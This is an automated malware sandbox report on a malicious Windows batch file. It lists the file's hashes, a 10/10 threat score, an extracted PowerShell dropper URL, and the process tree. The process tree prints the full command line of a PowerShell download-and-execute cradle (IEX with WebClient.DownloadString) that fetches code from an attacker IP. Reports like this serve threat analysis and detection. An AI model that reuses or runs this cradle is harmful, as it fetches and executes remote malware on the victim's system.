Analysis

  • max time kernel
    141s
  • max time network
    68s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    23-05-2020 16:10

General

  • Target

    aa924bdd41c78914cf9c258c5b04d440.bat

  • Size

    217B

  • MD5

    73b18c7ea72367714adfa391d407d44b

  • SHA1

    936cfb5cb7073a9e298eed93720a1e73b88b50b8

  • SHA256

    efb6eff4932c6a31030f3eff665d0228d063c0fc37fb274278e9ceb7e55f2fe8

  • SHA512

    60a9438888dc461e3c90e4df597bbe9420c700f1df7a62ede10b1e44a595336c948b4ec520a4589bc1f2f542d5c6e1b3388f55fead8501b40d843f3dbe3d3c98

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aa924bdd41c78914cf9c258c5b04d440.bat"
    1⤵
      PID:4004
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440');Invoke-JYKVBWWUMA;Start-Sleep -s 10000"
        2⤵
          PID:440
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:824

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/824-0-0x0000000004440000-0x0000000004441000-memory.dmp

        Filesize

        4KB

      • memory/824-1-0x0000000004440000-0x0000000004441000-memory.dmp

        Filesize

        4KB

      • memory/824-3-0x0000000004440000-0x0000000004441000-memory.dmp

        Filesize

        4KB

      • memory/824-5-0x0000000004830000-0x0000000004831000-memory.dmp

        Filesize

        4KB

      • memory/824-42-0x0000000004C30000-0x0000000004C31000-memory.dmp

        Filesize

        4KB